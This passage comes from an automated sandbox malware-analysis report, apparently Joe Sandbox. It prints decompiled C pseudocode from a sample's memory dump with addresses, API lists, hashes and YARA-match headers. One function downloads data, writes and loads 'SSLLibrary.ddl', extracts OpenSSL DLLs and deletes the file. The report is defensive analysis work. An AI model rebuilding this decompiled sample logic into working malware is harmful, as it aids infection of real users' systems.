                                                    						} else {
                                                    							_t21 = _a4 - 0x10; // 0xe87d83e8
                                                    							_v32 = E00441704( *_t21);
                                                    						}
                                                    						L19:
                                                    						_v12 = 0;
                                                    						_t65 = _a4;
                                                    						_v20 =  *((intOrPtr*)(_t65 - 9));
                                                    						_v16 =  *((intOrPtr*)(_t65 - 5));
                                                    						EnumThreadWindows(GetCurrentThreadId(), E00438884,  &_v32);
                                                    						_t127 = _v12;
                                                    						if(_v12 == 0) {
                                                    							goto L25;
                                                    						}
                                                    						GetWindowRect(_v24,  &_v48);
                                                    						_push(_a4 + 0xfffffff7);
                                                    						_push(_a4 - 1);
                                                    						L00403DE8(_t102, _t127);
                                                    						_t79 =  *0x49eb38; // 0x0
                                                    						_t111 =  *0x4360a0; // 0x4360ec
                                                    						if(L00403D78(_t79, _t111) == 0) {
                                                    							L23:
                                                    							if(IntersectRect( &_v48,  &_v48,  &_v64) != 0) {
                                                    								_v5 = 0;
                                                    							}
                                                    							goto L25;
                                                    						}
                                                    						_t85 =  *0x49eb38; // 0x0
                                                    						if( *((intOrPtr*)( *((intOrPtr*)(_t85 + 0x38)) + 0xa0)) == 0) {
                                                    							goto L23;
                                                    						}
                                                    						_t87 =  *0x49eb38; // 0x0
                                                    						if(E00441704( *((intOrPtr*)( *((intOrPtr*)(_t87 + 0x38)) + 0xa0))) == _v24) {
                                                    							goto L25;
                                                    						}
                                                    						goto L23;
                                                    					}
                                                    					_t117 = _t60;
                                                    					while(1) {
                                                    						_t94 =  *((intOrPtr*)(_t117 + 0x30));
                                                    						if(_t94 == 0) {
                                                    							break;
                                                    						}
                                                    						_t117 = _t94;
                                                    					}
                                                    					_v32 = E00441704(_t117);
                                                    					goto L19;
                                                    				}
                                                    				_t118 = L00437E5C(_v24, _t103);
                                                    				if(_t118 == 0) {
                                                    					goto L25;
                                                    				} else {
                                                    					while(1) {
                                                    						_t99 =  *((intOrPtr*)(_t118 + 0x30));
                                                    						if(_t99 == 0) {
                                                    							break;
                                                    						}
                                                    						_t118 = _t99;
                                                    					}
                                                    					_v24 = E00441704(_t118);
                                                    					goto L6;
                                                    				}
                                                    			}
                                                    Instruction addresses (per statement of the C-Code above; 0x00000000 marks statements with no own address):
                                                    0x004388f0 0x004388f9 0x004388fb 0x0043890a 0x0043890c 0x00438912 0x00438917 0x00438922 0x0043894b 0x0043894f
                                                    0x00438a7e 0x00438a87 0x00438a87 0x00438955 0x0043895b 0x0043895b 0x00438960 0x00000000 0x00000000 0x00438959
                                                    0x00438959 0x00438969 0x0043896b 0x00438971 0x00000000 0x00000000 0x0043897a 0x0043897d 0x00438982 0x004389a3
                                                    0x004389a6 0x004389b1 0x004389b3 0x004389c5 0x004389c7 0x004389b5 0x004389b8 0x004389c0 0x004389c0 0x004389ca
                                                    0x004389ca 0x004389ce 0x004389d4 0x004389da 0x004389ec 0x004389f1 0x004389f5 0x00000000 0x00000000 0x00438a03
                                                    0x00438a0e 0x00438a13 0x00438a23 0x00438a28 0x00438a2d 0x00438a3a 0x00438a65 0x00438a78 0x00438a7a 0x00438a7a
                                                    0x00000000 0x00438a78 0x00438a3c 0x00438a4b 0x00000000 0x00000000 0x00438a4d 0x00438a63 0x00000000 0x00000000
                                                    0x00000000 0x00438a63 0x00438987 0x0043898d 0x0043898d 0x00438992 0x00000000 0x00000000 0x0043898b 0x0043898b
                                                    0x0043899b 0x00000000 0x0043899b 0x0043892c 0x00438930 0x00000000 0x00438936 0x0043893a 0x0043893a 0x0043893f
                                                    0x00000000 0x00000000 0x00438938 0x00438938 0x00438948 0x00000000 0x00438948

                                                    APIs
                                                      • Part of subcall function 00438D40: WindowFromPoint.USER32(00438B1A,0049EB5C,00000000,0043890A,?,-0000000C,?), ref: 00438D46
                                                      • Part of subcall function 00438D40: GetParent.USER32(00000000), ref: 00438D5D
                                                    • GetWindow.USER32(00000000,00000004), ref: 00438912
                                                    • GetCurrentThreadId.KERNEL32 ref: 004389E6
                                                    • EnumThreadWindows.USER32(00000000,00438884,?), ref: 004389EC
                                                    • GetWindowRect.USER32 ref: 00438A03
                                                    • IntersectRect.USER32 ref: 00438A71
                                                      • Part of subcall function 00437E5C: GetWindowThreadProcessId.USER32(00000000), ref: 00437E69
                                                      • Part of subcall function 00437E5C: GetCurrentProcessId.KERNEL32(?,?,00000000,0045A3E7,?,?,0049ABD1,00000001,0045A553,?,?,?,0049ABD1), ref: 00437E72
                                                      • Part of subcall function 00437E5C: GlobalFindAtomA.KERNEL32(00000000), ref: 00437E87
                                                      • Part of subcall function 00437E5C: GetPropA.USER32 ref: 00437E9E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Window$Thread$CurrentProcessRect$AtomEnumFindFromGlobalIntersectParentPointPropWindows
                                                    • String ID: `C$tC
                                                    • API String ID: 2202917067-2788972245
                                                    • Opcode ID: 0eb7b7183224f25ed9cd336059e391895cb8aedaaf37bee30aa456c4423d9d4d
                                                    • Instruction ID: 3581ce7dd3e3bfbf2e623d4eb096478338c089ca1b68be53d8a0d9a7386b4eb1
                                                    • Opcode Fuzzy Hash: 0eb7b7183224f25ed9cd336059e391895cb8aedaaf37bee30aa456c4423d9d4d
                                                    • Instruction Fuzzy Hash: F6515F75A002099FCB10DFA9C481BAEB7F4AF08354F14516AF855EB351DB38ED41CB9A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetActiveWindow.USER32 ref: 0045A8B7
                                                    • GetWindowRect.USER32 ref: 0045A911
                                                    • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,?,?), ref: 0045A949
                                                    • MessageBoxA.USER32 ref: 0045A98A
                                                    • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,0045AA00,?,00000000,0045A9F9), ref: 0045A9DA
                                                    • SetActiveWindow.USER32(?,0045AA00,?,00000000,0045A9F9), ref: 0045A9EB
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Window$Active$MessageRect
                                                    • String ID: (
                                                    • API String ID: 3147912190-3887548279
                                                    • Opcode ID: 8cef1ea23398dab616a7e991724775971796e361134f7c3a3b04aaf4b6622f78
                                                    • Instruction ID: aa5883e2080ee4b6071f7524ee1856c0ab285683fbf4ba5b2f0a51d728674732
                                                    • Opcode Fuzzy Hash: 8cef1ea23398dab616a7e991724775971796e361134f7c3a3b04aaf4b6622f78
                                                    • Instruction Fuzzy Hash: 35414EB5E00108AFDB04DBA9CD85FAE77F9FB48305F14456AF900E7392D674AD048B55
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 94%
                                                    			E00428300(void* __eax, void* __ebx, int __ecx, intOrPtr* __edx, void* __edi, void* __esi) {
                                                    				intOrPtr* _v8;
                                                    				int _v12;
                                                    				BYTE* _v16;
                                                    				intOrPtr _v18;
                                                    				signed int _v24;
                                                    				short _v26;
                                                    				short _v28;
                                                    				short _v30;
                                                    				short _v32;
                                                    				char _v38;
                                                    				struct tagMETAFILEPICT _v54;
                                                    				intOrPtr _v118;
                                                    				intOrPtr _v122;
                                                    				struct tagENHMETAHEADER _v154;
                                                    				intOrPtr _t103;
                                                    				intOrPtr _t115;
                                                    				struct HENHMETAFILE__* _t119;
                                                    				struct HENHMETAFILE__* _t120;
                                                    				void* _t122;
                                                    				void* _t123;
                                                    				void* _t124;
                                                    				void* _t125;
                                                    				intOrPtr _t126;
                                                    
                                                    				_t124 = _t125;
                                                    				_t126 = _t125 + 0xffffff68;
                                                    				_v12 = __ecx;
                                                    				_v8 = __edx;
                                                    				_t122 = __eax;
                                                    				E0042819C(__eax);
                                                    				 *((intOrPtr*)( *_v8 + 0xc))(__edi, __esi, __ebx, _t123);
                                                    				if(_v38 != 0x9ac6cdd7 || E00426DA8( &_v38) != _v18) {
                                                    					L00425F58();
                                                    				}
                                                    				_v12 = _v12 - 0x16;
                                                    				_v16 = E0040275C(_v12);
                                                    				_t103 =  *((intOrPtr*)(_t122 + 0x28));
                                                    				 *[fs:eax] = _t126;
                                                    				 *((intOrPtr*)( *_v8 + 0xc))( *[fs:eax], 0x42846f, _t124);
                                                    				 *((short*)( *((intOrPtr*)(_t122 + 0x28)) + 0x18)) = _v24;
                                                    				if(_v24 == 0) {
                                                    					_v24 = 0x60;
                                                    				}
                                                    				 *((intOrPtr*)(_t103 + 0xc)) = MulDiv(_v28 - _v32, 0x9ec, _v24 & 0x0000ffff);
                                                    				 *((intOrPtr*)(_t103 + 0x10)) = MulDiv(_v26 - _v30, 0x9ec, _v24 & 0x0000ffff);
                                                    				_v54.mm = 8;
                                                    				_v54.xExt = 0;
                                                    				_v54.yExt = 0;
                                                    				_v54.hMF = 0;
                                                    				_t119 = SetWinMetaFileBits(_v12, _v16, 0,  &_v54);
                                                    				 *(_t103 + 8) = _t119;
                                                    				if(_t119 == 0) {
                                                    					L00425F58();
                                                    				}
                                                    				GetEnhMetaFileHeader( *(_t103 + 8), 0x64,  &_v154);
                                                    				_v54.mm = 8;
                                                    				_v54.xExt = _v122;
                                                    				_v54.yExt = _v118;
                                                    				_v54.hMF = 0;
                                                    				DeleteEnhMetaFile( *(_t103 + 8));
                                                    				_t120 = SetWinMetaFileBits(_v12, _v16, 0,  &_v54);
                                                    				 *(_t103 + 8) = _t120;
                                                    				if(_t120 == 0) {
                                                    					L00425F58();
                                                    				}
                                                    				 *((char*)(_t122 + 0x2c)) = 0;
                                                    				_pop(_t115);
                                                    				 *[fs:eax] = _t115;
                                                    				_push(0x428476);
                                                    				return E0040277C(_v16);
                                                    			}
                                                    0x00428301
                                                    0x00428303
                                                    0x0042830c
                                                    0x0042830f
                                                    0x00428312
                                                    0x00428316
                                                    0x00428328
                                                    0x00428332
                                                    0x00428342
                                                    0x00428342
                                                    0x00428347
                                                    0x00428353
                                                    0x00428356
                                                    0x00428364
                                                    0x00428372
                                                    0x0042837c
                                                    0x00428385
                                                    0x00428387
                                                    0x00428387
                                                    0x004283a7
                                                    0x004283c4
                                                    0x004283c7
                                                    0x004283d0
                                                    0x004283d5
                                                    0x004283da
                                                    0x004283f0
                                                    0x004283f2
                                                    0x004283f7
                                                    0x004283f9
                                                    0x004283f9
                                                    0x0042840b
                                                    0x00428410
                                                    0x0042841a
                                                    0x00428420
                                                    0x00428425
                                                    0x0042842c
                                                    0x00428444
                                                    0x00428446
                                                    0x0042844b
                                                    0x0042844d
                                                    0x0042844d
                                                    0x00428452
                                                    0x00428458
                                                    0x0042845b
                                                    0x0042845e
                                                    0x0042846e

                                                    APIs
                                                    • MulDiv.KERNEL32(?,000009EC,00000000), ref: 004283A2
                                                    • MulDiv.KERNEL32(?,000009EC,00000000), ref: 004283BF
                                                    • SetWinMetaFileBits.GDI32(00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC,00000000), ref: 004283EB
                                                    • GetEnhMetaFileHeader.GDI32(00000016,00000064,?,00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC,00000000), ref: 0042840B
                                                    • DeleteEnhMetaFile.GDI32(00000016), ref: 0042842C
                                                    • SetWinMetaFileBits.GDI32(00000016,?,00000000,00000008,00000016,00000064,?,00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC), ref: 0042843F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FileMeta$Bits$DeleteHeader
                                                    • String ID: `
                                                    • API String ID: 1990453761-2679148245
                                                    • Opcode ID: 0c01fd69f92b0b42f0212475d03f564d72d5169141e12a16344919336c70851a
                                                    • Instruction ID: d131a5009b9ae6a1c3985c7f4bbb4479256416dcbb727d86a178af25fe9cd39a
                                                    • Opcode Fuzzy Hash: 0c01fd69f92b0b42f0212475d03f564d72d5169141e12a16344919336c70851a
                                                    • Instruction Fuzzy Hash: B7410F75E00218AFDB00DFA9D485AAEB7F9EF48710F50846AF904F7281E7799D40CB69
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 65%
                                                    			E00495084(void* __ebx, void* __edi, void* __esi) {
                                                    				char _v5;
                                                    				char _v12;
                                                    				char _v16;
                                                    				char _v20;
                                                    				char _v24;
                                                    				char _v28;
                                                    				char _v32;
                                                    				intOrPtr* _t55;
                                                    				intOrPtr _t68;
                                                    				intOrPtr _t70;
                                                    				intOrPtr _t72;
                                                    				intOrPtr _t74;
                                                    				intOrPtr _t77;
                                                    				intOrPtr _t79;
                                                    				struct HINSTANCE__* _t82;
                                                    				void* _t84;
                                                    				intOrPtr _t87;
                                                    
                                                    				_push(0);
                                                    				_push(0);
                                                    				_push(0);
                                                    				_push(0);
                                                    				_push(0);
                                                    				_push(0);
                                                    				_push(0);
                                                    				_push(__ebx);
                                                    				_push(__esi);
                                                    				_push(_t87);
                                                    				_push(0x4951d4);
                                                    				_push( *[fs:eax]);
                                                    				 *[fs:eax] = _t87;
                                                    				_t84 = 3;
                                                    				_t55 = 0x49f0f4;
                                                    				do {
                                                    					if( *_t55 == 0) {
                                                    						goto L5;
                                                    					} else {
                                                    						_t68 =  *0x49f100; // 0x0
                                                    						E00404CCC( &_v12, "\\SSLLibrary.ddl", _t68);
                                                    						if(E00474D50( *_t55, _t55, _v12, _t84) == 0) {
                                                    							_v5 = 0;
                                                    							goto L5;
                                                    						} else {
                                                    							_v5 = 1;
                                                    							_t72 =  *0x49f100; // 0x0
                                                    							E00404CCC( &_v16, "\\SSLLibrary.ddl", _t72);
                                                    							_t82 = LoadLibraryA(E00404E80(_v16));
                                                    							_t56 = E0041E0D0(_t82, 1, 0xa, "LIBEAY32");
                                                    							_t74 =  *0x49f100; // 0x0
                                                    							E00404CCC( &_v20, "\\libeay32.dll", _t74);
                                                    							E0041DD9C(_t30, _t56, _v20, _t82);
                                                    							L00403BEC(_t56);
                                                    							_t57 = E0041E0D0(_t82, 1, 0xa, "SSLEAY32");
                                                    							_t77 =  *0x49f100; // 0x0
                                                    							E00404CCC( &_v24, "\\ssleay32.dll", _t77);
                                                    							E0041DD9C(_t38, _t57, _v24, _t82);
                                                    							L00403BEC(_t57);
                                                    							FreeLibrary(_t82);
                                                    							_t79 =  *0x49f100; // 0x0
                                                    							E00404CCC( &_v32, "\\SSLLibrary.ddl", _t79);
                                                    							E00404BB8( &_v28, E00404E80(_v32));
                                                    							L00409BAC(_v28);
                                                    						}
                                                    					}
                                                    					break;
                                                    					L5:
                                                    					_t55 = _t55 + 4;
                                                    					_t84 = _t84 - 1;
                                                    				} while (_t84 != 0);
                                                    				_pop(_t70);
                                                    				 *[fs:eax] = _t70;
                                                    				_push(0x4951db);
                                                    				return E004049E4( &_v32, 6);
                                                    			}
                                                    0x00495089
                                                    0x0049508a
                                                    0x0049508b
                                                    0x0049508c
                                                    0x0049508d
                                                    0x0049508e
                                                    0x0049508f
                                                    0x00495090
                                                    0x00495091
                                                    0x00495095
                                                    0x00495096
                                                    0x0049509b
                                                    0x0049509e
                                                    0x004950a1
                                                    0x004950a6
                                                    0x004950ab
                                                    0x004950ae
                                                    0x00000000
                                                    0x004950b4
                                                    0x004950bc
                                                    0x004950c2
                                                    0x004950d3
                                                    0x004951ab
                                                    0x00000000
                                                    0x004950d9
                                                    0x004950d9
                                                    0x004950e5
                                                    0x004950eb
                                                    0x004950fe
                                                    0x00495115
                                                    0x0049511f
                                                    0x00495125
                                                    0x0049512f
                                                    0x00495136
                                                    0x00495150
                                                    0x0049515a
                                                    0x00495160
                                                    0x0049516a
                                                    0x00495171
                                                    0x00495177
                                                    0x00495184
                                                    0x0049518a
                                                    0x0049519c
                                                    0x004951a4
                                                    0x004951a4
                                                    0x004950d3
                                                    0x00000000
                                                    0x004951af
                                                    0x004951af
                                                    0x004951b2
                                                    0x004951b2
                                                    0x004951bb
                                                    0x004951be
                                                    0x004951c1
                                                    0x004951d3

                                                    APIs
                                                      • Part of subcall function 00474D50: InternetOpenA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00474DAE
                                                      • Part of subcall function 00474D50: InternetOpenUrlA.WININET(?,00000000,00000000,00000000,84000000,00000000), ref: 00474DDB
                                                      • Part of subcall function 00474D50: InternetReadFile.WININET(?,?,00000400,?), ref: 00474E25
                                                      • Part of subcall function 00474D50: InternetCloseHandle.WININET(?), ref: 00474E6E
                                                    • LoadLibraryA.KERNEL32(00000000,00000000,004951D4,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004950F9
                                                    • FreeLibrary.KERNEL32(00000000,0000000A,SSLEAY32,0000000A,LIBEAY32,00000000,00000000,004951D4,?,?,?,?,00000000,00000000,00000000,00000000), ref: 00495177
                                                      • Part of subcall function 00409BAC: DeleteFileA.KERNEL32(00000000,0049C9B0,00475D16,00000000,00475D3C), ref: 00409BB7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Internet$FileLibraryOpen$CloseDeleteFreeHandleLoadRead
                                                    • String ID: LIBEAY32$SSLEAY32$\SSLLibrary.ddl$\libeay32.dll$\ssleay32.dll
                                                    • API String ID: 1893608559-2695981766
                                                    • Opcode ID: b9b64cd10222cbfc43811778c3e9705247d2973ed7e941e70c5c3ecfe2b2726d
                                                    • Instruction ID: 33ec969f5ea1b72477d048da23142bfffb93f2672bd1290969d982d35f2b6f3b
                                                    • Opcode Fuzzy Hash: b9b64cd10222cbfc43811778c3e9705247d2973ed7e941e70c5c3ecfe2b2726d
                                                    • Instruction Fuzzy Hash: A0319870B042049BDB01EB65DC82BAF7B75EB94304F20857BE901A7392DB7DAD05879C
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 67%
                                                    			E0042C82C(struct HMONITOR__* _a4, struct tagMONITORINFO* _a8) {
                                                    				void _v20;
                                                    				void* __ebx;
                                                    				void* __edi;
                                                    				void* __esi;
                                                    				void* __ebp;
                                                    				void* _t23;
                                                    				int _t24;
                                                    				struct HMONITOR__* _t27;
                                                    				struct tagMONITORINFO* _t29;
                                                    				intOrPtr* _t31;
                                                    
                                                    				_t29 = _a8;
                                                    				_t27 = _a4;
                                                    				if( *0x49e92c != 0) {
                                                    					_t24 = 0;
                                                    					if(_t27 == 0x12340042 && _t29 != 0 && _t29->cbSize >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
                                                    						_t29->rcMonitor.left = 0;
                                                    						_t29->rcMonitor.top = 0;
                                                    						_t29->rcMonitor.right = GetSystemMetrics(0);
                                                    						_t29->rcMonitor.bottom = GetSystemMetrics(1);
                                                    						asm("movsd");
                                                    						asm("movsd");
                                                    						asm("movsd");
                                                    						asm("movsd");
                                                    						_t31 = _t29;
                                                    						 *(_t31 + 0x24) = 1;
                                                    						if( *_t31 >= 0x4c) {
                                                    							_push("DISPLAY");
                                                    							_push(_t31 + 0x28);
                                                    							L00407298();
                                                    						}
                                                    						_t24 = 1;
                                                    					}
                                                    				} else {
                                                    					 *0x49e910 = E0042C4FC(4, _t23,  *0x49e910, _t27, _t29);
                                                    					_t24 = GetMonitorInfoA(_t27, _t29);
                                                    				}
                                                    				return _t24;
                                                    			}
                                                    0x0042c835
                                                    0x0042c838
                                                    0x0042c842
                                                    0x0042c867
                                                    0x0042c86f
                                                    0x0042c88f
                                                    0x0042c894
                                                    0x0042c89f
                                                    0x0042c8aa
                                                    0x0042c8b4
                                                    0x0042c8b5
                                                    0x0042c8b6
                                                    0x0042c8b7
                                                    0x0042c8b8
                                                    0x0042c8b9
                                                    0x0042c8c3
                                                    0x0042c8c5
                                                    0x0042c8cd
                                                    0x0042c8ce
                                                    0x0042c8ce
                                                    0x0042c8d3
                                                    0x0042c8d3
                                                    0x0042c844
                                                    0x0042c856
                                                    0x0042c863
                                                    0x0042c863
                                                    0x0042c8dd

                                                    APIs
                                                    • GetMonitorInfoA.USER32(?,?), ref: 0042C85D
                                                    • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0042C884
                                                    • GetSystemMetrics.USER32 ref: 0042C899
                                                    • GetSystemMetrics.USER32 ref: 0042C8A4
                                                    • lstrcpy.KERNEL32(?,DISPLAY), ref: 0042C8CE
                                                      • Part of subcall function 0042C4FC: GetProcAddress.KERNEL32(768F0000,00000000), ref: 0042C57C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: System$InfoMetrics$AddressMonitorParametersProclstrcpy
                                                    • String ID: DISPLAY$GetMonitorInfo
                                                    • API String ID: 1539801207-1633989206
                                                    • Opcode ID: fa4bae191739b45e5aec941b0add0c014022072654a4bc21e87a1519e8d0f9cd
                                                    • Instruction ID: fd539ca8d8add89cf6c2a40af9093eb6b2d142832e41177ff4ac11c4fa6a4bef
                                                    • Opcode Fuzzy Hash: fa4bae191739b45e5aec941b0add0c014022072654a4bc21e87a1519e8d0f9cd
                                                    • Instruction Fuzzy Hash: 3211E4B17013109FD720EF66AC84BABB7E9EB05712F40893BE815D7240D3B5A900CBA9
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 79%
                                                    			E004047C0(void* __ecx) {
                                                    				long _v4;
                                                    				int _t3;
                                                    
                                                    				if( *0x49e04c == 0) {
                                                    					if( *0x49b034 == 0) {
                                                    						_t3 = MessageBoxA(0, "Runtime error     at 00000000", "Error", 0);
                                                    					}
                                                    					return _t3;
                                                    				} else {
                                                    					if( *0x49e220 == 0xd7b2 &&  *0x49e228 > 0) {
                                                    						 *0x49e238();
                                                    					}
                                                    					WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1e,  &_v4, 0);
                                                    					return WriteFile(GetStdHandle(0xfffffff5), E00404848, 2,  &_v4, 0);
                                                    				}
                                                    			}

                                                    APIs
                                                    • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,0049ABAD,00000000,?,0040488E,?,?,?,00000002,0040492E,0040286B,004028B3,Synaptics,00000000), ref: 004047F9
                                                    • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,0049ABAD,00000000,?,0040488E,?,?,?,00000002,0040492E,0040286B,004028B3,Synaptics), ref: 004047FF
                                                    • GetStdHandle.KERNEL32(000000F5,00404848,00000002,0049ABAD,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,0049ABAD,00000000,?,0040488E), ref: 00404814
                                                    • WriteFile.KERNEL32(00000000,000000F5,00404848,00000002,0049ABAD,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,0049ABAD,00000000,?,0040488E), ref: 0040481A
                                                    • MessageBoxA.USER32 ref: 00404838
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FileHandleWrite$Message
                                                    • String ID: Error$Runtime error at 00000000
                                                    • API String ID: 1570097196-2970929446
                                                    • Opcode ID: 1dcbe707f156ef72c6b32e8e434cf4761e4d92a63b110f457c2787cb3198cc4d
                                                    • Instruction ID: d031fbb1000275bb1cbc2334fc3dd0bc9fcf369acb127de660da951a48ee9705
                                                    • Opcode Fuzzy Hash: 1dcbe707f156ef72c6b32e8e434cf4761e4d92a63b110f457c2787cb3198cc4d
                                                    • Instruction Fuzzy Hash: F9F096D564038075FE20B3626E07F5B255C8794B19F244ABFB320B50E297BC54C0865D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 55%
                                                    			E00448030(void* __eax, void* __ecx, intOrPtr __edx, void* __eflags, char _a4, intOrPtr _a8, int _a12, int _a16) {
                                                    				intOrPtr _v8;
                                                    				struct HDC__* _v12;
                                                    				char _v28;
                                                    				char _v44;
                                                    				void* __edi;
                                                    				void* __ebp;
                                                    				void* _t46;
                                                    				void* _t57;
                                                    				int _t85;
                                                    				void* _t119;
                                                    				void* _t120;
                                                    				void* _t129;
                                                    				struct HDC__* _t138;
                                                    				struct HDC__* _t139;
                                                    				int _t140;
                                                    				void* _t141;
                                                    
                                                    				_t121 = __ecx;
                                                    				_t137 = __ecx;
                                                    				_v8 = __edx;
                                                    				_t120 = __eax;
                                                    				_t46 = L00447BD0(__eax);
                                                    				if(_t46 != 0) {
                                                    					_t144 = _a4;
                                                    					if(_a4 == 0) {
                                                    						__eflags =  *(_t120 + 0x54);
                                                    						if( *(_t120 + 0x54) == 0) {
                                                    							_t140 = L00429914(1);
                                                    							 *(_t120 + 0x54) = _t140;
                                                    							E0042AD38(_t140, 1);
                                                    							 *((intOrPtr*)( *_t140 + 0x40))();
                                                    							_t121 =  *_t140;
                                                    							 *((intOrPtr*)( *_t140 + 0x34))();
                                                    						}
                                                    						E004255DC( *((intOrPtr*)(L00429EDC( *(_t120 + 0x54)) + 0x14)), _t121, 0xffffff, _t137, _t141, __eflags);
                                                    						E00419804( *(_t120 + 0x34), 0,  &_v44,  *(_t120 + 0x30));
                                                    						_push( &_v44);
                                                    						_t57 = L00429EDC( *(_t120 + 0x54));
                                                    						_pop(_t129);
                                                    						L00425980(_t57, _t129);
                                                    						_push(0);
                                                    						_push(0);
                                                    						_push(0xffffffff);
                                                    						_push(0);
                                                    						_push(0);
                                                    						_push(0);
                                                    						_push(0);
                                                    						_push(L00425C68(L00429EDC( *(_t120 + 0x54))));
                                                    						_push(_v8);
                                                    						_push(L00447D0C(_t120));
                                                    						L0042C454();
                                                    						E00419804(_a16 +  *(_t120 + 0x34), _a12,  &_v28, _a12 +  *(_t120 + 0x30));
                                                    						_v12 = L00425C68(L00429EDC( *(_t120 + 0x54)));
                                                    						E004255DC( *((intOrPtr*)(_t137 + 0x14)), _a16 +  *(_t120 + 0x34), 0xff000014, _t137, _t141, __eflags);
                                                    						_t138 = L00425C68(_t137);
                                                    						SetTextColor(_t138, 0xffffff);
                                                    						SetBkColor(_t138, 0);
                                                    						_t85 = _a16 + 1;
                                                    						__eflags = _t85;
                                                    						BitBlt(_t138, _t85, _a12 + 1,  *(_t120 + 0x34),  *(_t120 + 0x30), _v12, 0, 0, 0xe20746);
                                                    						E004255DC( *((intOrPtr*)(_t137 + 0x14)), _a16 +  *(_t120 + 0x34), 0xff000010, _t137, _t141, _t85);
                                                    						_t139 = L00425C68(_t137);
                                                    						SetTextColor(_t139, 0xffffff);
                                                    						SetBkColor(_t139, 0);
                                                    						return BitBlt(_t139, _a16, _a12,  *(_t120 + 0x34),  *(_t120 + 0x30), _v12, 0, 0, 0xe20746);
                                                    					}
                                                    					_push(_a8);
                                                    					_push(L00447A20(_t144));
                                                    					E00448008(_t120, _t144);
                                                    					_push(L00447A20(_t144));
                                                    					_push(0);
                                                    					_push(0);
                                                    					_push(_a12);
                                                    					_push(_a16);
                                                    					_push(L00425C68(__ecx));
                                                    					_push(_v8);
                                                    					_t119 = L00447D0C(_t120);
                                                    					_push(_t119);
                                                    					L0042C454();
                                                    					return _t119;
                                                    				}
                                                    				return _t46;
                                                    			}

                                                    APIs
                                                    • 739F2430.COMCTL32(00000000,?,00000000,?,?,00000000,00000000,00000000,00000000,?), ref: 0044808F
                                                    • 739F2430.COMCTL32(00000000,?,00000000,00000000,00000000,00000000,00000000,000000FF,00000000,00000000), ref: 00448130
                                                    • SetTextColor.GDI32(00000000,00FFFFFF), ref: 0044817D
                                                    • SetBkColor.GDI32(00000000,00000000), ref: 00448185
                                                    • BitBlt.GDI32(00000000,?,?,?,?,00000000,00000000,00000000,00E20746), ref: 004481AA
                                                      • Part of subcall function 00448008: 739F2240.COMCTL32(00000000,?,00448069,00000000,?), ref: 0044801E
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ColorF2430$F2240Text
                                                    • String ID:
                                                    • API String ID: 314387739-0
                                                    • Opcode ID: 0e3cdef7bdb274e821ccc08bc87dcb32e9a8b685ab06af03303f3fbc7a5d5b72
                                                    • Instruction ID: f210b0e3c06df9566387ab9d1a3fb44fb9a992e98e90bafaba036239795fc9e8
                                                    • Opcode Fuzzy Hash: 0e3cdef7bdb274e821ccc08bc87dcb32e9a8b685ab06af03303f3fbc7a5d5b72
